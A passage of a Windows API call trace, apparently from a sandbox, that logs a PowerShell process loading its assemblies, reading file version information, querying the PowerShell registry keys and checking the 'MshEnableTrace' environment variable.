returned 0x2d1140 [0099.392] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1140, nSize=0x80 | out: lpBuffer="") returned 0x0 [0099.393] CoTaskMemFree (pv=0x2d1140) [0099.394] CoTaskMemAlloc (cb=0x104) returned 0x2d1140 [0099.394] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1140, nSize=0x80 | out: lpBuffer="") returned 0x0 [0099.394] CoTaskMemFree (pv=0x2d1140) [0099.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0099.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0099.404] SetErrorMode (uMode=0x1) returned 0x1 [0099.404] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1ad6a0 | out: lpFileInformation=0x1ad6a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0099.404] SetErrorMode (uMode=0x1) returned 0x1 [0099.405] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1ad910 | out: lpdwHandle=0x1ad910) returned 0x94c [0099.405] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2be7378 | out: lpData=0x2be7378) returned 1 [0099.406] VerQueryValueW (in: pBlock=0x2be7378, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ad888, puLen=0x1ad880 | out: lplpBuffer=0x1ad888*=0x2be7414, puLen=0x1ad880) returned 1 [0099.406] VerQueryValueW (in: pBlock=0x2be7378, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1ad7f8, puLen=0x1ad7f0 | out: lplpBuffer=0x1ad7f8*=0x2be74f0, puLen=0x1ad7f0) returned 1 [0099.406] lstrlenW (lpString="Microsoft Corporation") returned 21 [0099.406] CoTaskMemAlloc (cb=0x2e) returned 0x2c5630 [0099.406] lstrcpyW (in: lpString1=0x2c5630, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0099.406] CoTaskMemFree (pv=0x2c5630) [0099.407] VerQueryValueW (in: pBlock=0x2be7378, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1ad7f8, puLen=0x1ad7f0 | out: lplpBuffer=0x1ad7f8*=0x2be7544, puLen=0x1ad7f0) returned 1 [0099.407] lstrlenW (lpString="System.Management.Automation") returned 28 [0099.407] CoTaskMemAlloc (cb=0x3c) returned 0x2c69f0 [0099.407] lstrcpyW (in: lpString1=0x2c69f0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0099.407] CoTaskMemFree (pv=0x2c69f0) [0099.407] VerQueryValueW (in: pBlock=0x2be7378, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1ad7f8, puLen=0x1ad7f0 | out: lplpBuffer=0x1ad7f8*=0x2be75a0, puLen=0x1ad7f0) returned 1 [0099.407] lstrlenW (lpString="6.1.7601.17514") returned 14 [0099.407] CoTaskMemAlloc (cb=0x20) returned 0x2cc110 [0099.407] lstrcpyW (in: lpString1=0x2cc110, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0099.407] CoTaskMemFree (pv=0x2cc110) [0099.407] VerQueryValueW (in: pBlock=0x2be7378, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1ad7f8, puLen=0x1ad7f0 | out: lplpBuffer=0x1ad7f8*=0x2be75e0, puLen=0x1ad7f0) returned 1 [0099.407] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0099.407] CoTaskMemAlloc (cb=0x44) returned 0x2c69f0 [0099.407] lstrcpyW (in: lpString1=0x2c69f0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0099.407] CoTaskMemFree (pv=0x2c69f0) [0099.407] VerQueryValueW (in: pBlock=0x2be7378, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1ad7f8, puLen=0x1ad7f0 | out: lplpBuffer=0x1ad7f8*=0x2be7648, puLen=0x1ad7f0) returned 1 [0099.407] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0099.407] CoTaskMemAlloc (cb=0x76) returned 0x274710 [0099.407] lstrcpyW (in: lpString1=0x274710, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0099.407] CoTaskMemFree (pv=0x274710) [0099.407] VerQueryValueW (in: pBlock=0x2be7378, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1ad7f8, puLen=0x1ad7f0 | out: lplpBuffer=0x1ad7f8*=0x2be76e4, puLen=0x1ad7f0) returned 1 [0099.407] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0099.407] CoTaskMemAlloc (cb=0x44) returned 0x2c69f0 [0099.407] lstrcpyW (in: lpString1=0x2c69f0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0099.407] CoTaskMemFree (pv=0x2c69f0) [0099.407] VerQueryValueW (in: pBlock=0x2be7378, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1ad7f8, puLen=0x1ad7f0 | out: lplpBuffer=0x1ad7f8*=0x2be7748, puLen=0x1ad7f0) returned 1 [0099.407] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0099.408] CoTaskMemAlloc (cb=0x58) returned 0x22aa50 [0099.408] lstrcpyW (in: lpString1=0x22aa50, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0099.408] CoTaskMemFree (pv=0x22aa50) [0099.408] VerQueryValueW (in: pBlock=0x2be7378, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1ad7f8, puLen=0x1ad7f0 | out: lplpBuffer=0x1ad7f8*=0x2be77c4, puLen=0x1ad7f0) returned 1 [0099.408] lstrlenW (lpString="6.1.7601.17514") returned 14 [0099.408] CoTaskMemAlloc (cb=0x20) returned 0x2cc110 [0099.408] lstrcpyW (in: lpString1=0x2cc110, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0099.408] CoTaskMemFree (pv=0x2cc110) [0099.408] VerQueryValueW (in: pBlock=0x2be7378, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1ad7f8, puLen=0x1ad7f0 | out: lplpBuffer=0x1ad7f8*=0x2be746c, puLen=0x1ad7f0) returned 1 [0099.408] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0099.408] CoTaskMemAlloc (cb=0x66) returned 0x247f10 [0099.408] lstrcpyW (in: lpString1=0x247f10, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0099.408] CoTaskMemFree (pv=0x247f10) [0099.408] VerQueryValueW (in: pBlock=0x2be7378, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1ad7f8, puLen=0x1ad7f0 | out: lplpBuffer=0x1ad7f8*=0x0, puLen=0x1ad7f0) returned 0 [0099.408] VerQueryValueW (in: pBlock=0x2be7378, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1ad7f8, puLen=0x1ad7f0 | out: lplpBuffer=0x1ad7f8*=0x0, puLen=0x1ad7f0) returned 0 [0099.408] VerQueryValueW (in: pBlock=0x2be7378, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1ad7f8, puLen=0x1ad7f0 | out: lplpBuffer=0x1ad7f8*=0x0, puLen=0x1ad7f0) returned 0 [0099.408] VerQueryValueW (in: pBlock=0x2be7378, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ad7c8, puLen=0x1ad7c0 | out: lplpBuffer=0x1ad7c8*=0x2be7414, puLen=0x1ad7c0) returned 1 [0099.408] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0099.408] VerLanguageNameW (in: wLang=0x0, szLang=0x26e210, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0099.408] CoTaskMemFree (pv=0x26e210) [0099.408] VerQueryValueW (in: pBlock=0x2be7378, lpSubBlock="\\", lplpBuffer=0x1ad818, puLen=0x1ad810 | out: lplpBuffer=0x1ad818*=0x2be73a0, puLen=0x1ad810) returned 1 [0099.416] CoTaskMemAlloc (cb=0x104) returned 0x2d1140 [0099.416] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1140, nSize=0x80 | out: lpBuffer="") returned 0x0 [0099.416] CoTaskMemFree (pv=0x2d1140) [0099.420] CoTaskMemAlloc (cb=0x104) returned 0x2d1140 [0099.420] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1140, nSize=0x80 | out: lpBuffer="") returned 0x0 [0099.420] CoTaskMemFree (pv=0x2d1140) [0099.425] lstrlenW (lpString="䅁") returned 1 [0099.437] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad6e8 | out: phkResult=0x1ad6e8*=0x304) returned 0x0 [0099.439] RegOpenKeyExW (in: hKey=0x304, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad6d8 | out: phkResult=0x1ad6d8*=0x308) returned 0x0 [0099.439] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad768 | out: phkResult=0x1ad768*=0x30c) returned 0x0 [0099.441] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad6ac, lpData=0x0, lpcbData=0x1ad6a8*=0x0 | out: lpType=0x1ad6ac*=0x1, lpData=0x0, lpcbData=0x1ad6a8*=0x56) returned 0x0 [0099.442] CoTaskMemAlloc (cb=0x5a) returned 0x248060 [0099.442] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad67c, lpData=0x248060, lpcbData=0x1ad678*=0x56 | out: lpType=0x1ad67c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad678*=0x56) returned 0x0 [0099.442] CoTaskMemFree (pv=0x248060) [0099.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0099.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0099.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0099.490] CoTaskMemAlloc (cb=0x104) returned 0x2d2140 [0099.490] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d2140, nSize=0x80 | out: lpBuffer="") returned 0x0 [0099.490] CoTaskMemFree (pv=0x2d2140) [0099.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ad2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0099.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ad2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0099.762] CoTaskMemAlloc (cb=0x104) returned 0x2d7610 [0099.762] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d7610, nSize=0x80 | out: lpBuffer="") returned 0x0 [0099.762] CoTaskMemFree (pv=0x2d7610) [0099.762] CoTaskMemAlloc (cb=0x104) returned 0x2d7610 [0099.763] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d7610, nSize=0x80 | out: lpBuffer="") returned 0x0 [0099.763] CoTaskMemFree (pv=0x2d7610) [0099.792] CoTaskMemAlloc (cb=0x104) returned 0x2d7740 [0099.792] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0099.793] CoTaskMemFree (pv=0x2d7740) [0099.794] CoTaskMemAlloc (cb=0x104) returned 0x2d7740 [0099.794] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0099.794] CoTaskMemFree (pv=0x2d7740) [0099.794] CoTaskMemAlloc (cb=0x104) returned 0x2d7740 [0099.794] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0099.794] CoTaskMemFree (pv=0x2d7740) [0099.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0099.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0099.930] CoTaskMemAlloc (cb=0x104) returned 0x2e2010 [0099.930] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e2010, nSize=0x80 | out: lpBuffer="") returned 0x0 [0099.930] CoTaskMemFree (pv=0x2e2010) [0099.933] CoTaskMemAlloc (cb=0x104) returned 0x2e2010 [0099.933] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e2010, nSize=0x80 | out: lpBuffer="") returned 0x0 [0099.933] CoTaskMemFree (pv=0x2e2010) [0099.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0099.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0101.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ad2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0101.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ad2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0101.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0101.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0101.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0101.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0101.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ad2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0101.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ad2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0101.515] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0101.545] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0101.545] CoTaskMemFree (pv=0x1b7400b0) [0101.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0101.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0101.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0101.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0101.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1ad3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0101.591] SetErrorMode (uMode=0x1) returned 0x1 [0101.591] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1ad640 | out: lpFileInformation=0x1ad640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0101.591] SetErrorMode (uMode=0x1) returned 0x1 [0101.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0101.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0101.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0101.973] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0101.973] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0101.973] CoTaskMemFree (pv=0x1b7400b0) [0101.976] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0101.976] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0101.976] CoTaskMemFree (pv=0x1b7400b0) [0101.977] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0101.977] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0101.977] CoTaskMemFree (pv=0x1b7400b0) [0101.990] CoCreateGuid (in: pguid=0x1ada08 | out: pguid=0x1ada08*(Data1=0xade797c2, Data2=0x8563, Data3=0x4806, Data4=([0]=0xb0, [1]=0xed, [2]=0x17, [3]=0x57, [4]=0x33, [5]=0xf, [6]=0xa3, [7]=0x3c))) returned 0x0 [0101.994] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0101.994] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0101.994] CoTaskMemFree (pv=0x1b7400b0) [0101.997] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0101.997] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0101.997] CoTaskMemFree (pv=0x1b7400b0) 